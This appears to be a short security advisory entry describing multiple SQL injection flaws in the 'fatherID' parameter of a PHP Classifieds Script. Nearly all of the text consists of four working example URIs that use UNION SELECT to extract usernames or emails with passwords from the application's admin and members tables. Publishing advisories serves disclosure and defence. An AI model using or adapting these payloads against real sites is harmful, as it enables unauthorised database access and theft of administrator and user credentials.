|
PHP Classifieds Script 'fatherID' Parameter Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser. The following example URIs are available: http://www.example.com/browse.php?fatherID=-7+union+select+0,1,2,3,4,5,6,7,8,concat(username,0x3a,password),10+from+admin/* http://www.example.com/search.php?fatherID=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9,10+from+admin/* http://www.example.com/browse.php?fatherID=-9999999+union%20select+0,1,2,3,4,5,6,7,8,concat(email,0x3a,password),10+from+members/* http://www.example.com/search.php?fatherID=-9999999+union+select+0,concat(email,0x3a,password),2,3,4,5,6,7,8,9,10+from+members/* |
|
|
Privacy Statement |
